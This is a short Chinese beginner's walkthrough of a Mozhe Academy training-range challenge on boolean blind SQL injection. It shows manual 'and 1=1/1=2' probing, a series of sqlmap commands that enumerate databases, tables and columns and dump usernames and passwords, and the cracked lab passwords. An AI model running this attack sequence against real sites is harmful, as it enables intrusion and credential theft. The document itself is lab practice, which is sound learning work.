这是我作为小白第一次成功的把key找出来了,分享一下
墨者学院的靶场SQL注入漏洞测试(布尔盲注)
IP地址 : 219.153.49.228
端口 : 40205
协议 : http
首先我输入了IP地址和端口号
看到这个后,我按了F12看了后台的代码,看完之后猜测http://219.153.49.228:40205/new_list.php?id=1可进行注入,然后直接加’或and 1=1和and1=2看页面是否发生变化,可以看出是否有注入。
输入http://219.153.49.228:40205/new_list.php?id=1 and 1=1
接着输入http://219.153.49.228:40205/new_list.php?id=1 and 1=2,页面发生变化了,由此可以知道有注入点。
接下来打开sqlmap ,用sqlmap扫一下,输入sqlmap.py -u http://219.153.49.228:40205/new_list.php?id=1 --dbs 获取到5个数据库,刚开始猜测是test数据库,进行之后发现是错误的。然后就猜测是stormgroup数据库
接下来是获取数据库中的表,输入sqlmap.py -u http://219.153.49.228:40205/new_list.php?id=1 -D stormgroup --tables 获取到的表是member和notice
这里已经获取了数据库和表了,接下来是想办法获取它的列,所以输入sqlmap.py -u http://219.153.49.228:40205/new_list.php?id=1 -D stormgroup -T member --columns 获取到的列名分别是 name password status
接下来就是想办法把name和password查找出来,所以输入:sqlmap.py -u http://219.153.49.228:40205/new_list.php?id=1 -D stormgroup -T member -C name,password --dump 得到的两个用户名都是mozhe,两个密码分别是这两个,然后进行md5解密。
解密得到的密码分别是
528469
900904
输入之后登陆成功,然后获取key